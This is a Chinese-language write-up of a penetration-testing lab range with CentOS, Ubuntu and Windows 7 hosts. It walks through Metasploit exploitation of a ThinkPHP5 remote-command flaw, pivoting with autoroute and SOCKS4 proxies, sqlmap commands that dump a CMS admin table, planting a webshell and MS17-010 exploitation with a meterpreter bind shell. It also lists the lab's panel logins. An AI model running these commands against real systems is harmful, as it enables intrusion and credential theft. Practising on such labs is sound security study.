一、环境搭建
链接:https://pan.baidu.com/s/1pOaY0JSTd8ONNsjNqOrUBg?pwd=jvjk
提取码:jvjk
网络环境
1.CentOS
用101段的ip访问宝塔面板,进去修改web页面的配置,地址:http://192.168.101.55:8888/a768f109/,账号:eaj3yhsl,密码:41bb8fee
2.Ubuntu
同理我们用22段的ip去修改配置,地址http://192.168.22.128:8888/2cc52ec0,账号xdynr37d,密码123qwe..
3.Win7
win7不需要什么配置,开着就行
环境搭建完成后可以相互ping以下确保搭建成功
二、渗透测试
1.信息收集
使用nmap对目标端口进行扫描
显示MySQL未授权,可以尝试一下,但没有成功,应该做了ip限制
2.获取CentOS的权限
发现有个web站点,可以访问一下
是用ThinkPHP5搭建的网站,很可能存在远程命令执行漏洞,在msf中搜索一下有没有exp
尝试一下
成功获取到shell,ifconfig一下,发现其有两个ip,说明存在内网环境,继续进行信息收集
3.内网信息收集
使用msf添加路由,成功添加
- run autoroute -s 192.168.22.0/24
- run autoroute -p
再添加sock4代理,使得kali可以访问到22网段
- set srvhost 192.168.101.31
- set version 4a
- run
再进入 /etc/proxychains4.conf 修改配置
arp -a 发现22段有一个128的主机,使用nmap对其进行端口扫描
对浏览器进行sock4配置即可访问到128的网站
发现是一个CMS搭建的网站,并且作者给了提示,用sqlmap进行注入
proxychains4 sqlmap -u "192.168.22.128/index.php?r=vul&keyword=1" --dbs
proxychains4 sqlmap -u "192.168.22.128/index.php?r=vul&keyword=1" -D bagecms --tables
proxychains4 sqlmap -u "192.168.22.128/index.php?r=vul&keyword=1" -D bagecms -T bage_admin --columns
proxychains4 sqlmap -u "192.168.22.128/index.php?r=vul&keyword=1" -D bagecms -T bage_admin -C username,password --dump
得到用户名和密码
使用dirsearch扫描到robots.txt,发现后台登录地址
4.获取ubuntu的shell
在模板中写入webshell,用蚁剑代理后连接
5.内网信息收集
ifconfig,发现33网段
这时要生成一个正向的木马,因为内网中的ubuntu访问不到kali
使用代理开启msf,并开启监听
成功拿到ubuntu的shell
发现其有两个ip,33网段也有其他主机
继续添加路由run autoroute -s 192.168.33.0/24
run autoroute -s 192.168.33.0/24
run autoroute -p
配置代理,继续用nmap扫描
6.window拿shell
window7系统,可以尝试ms17-010漏洞,在msf中搜索
search ms17-010
use 1
set lport 1234
set rhosts 192.168.33.33
set payload windows/x64/meterpreter/bind_tcp
成功拿到shell
总结:学到了msf的使用方法,还有本来想用frp的,结果忘记仅主机不出网了。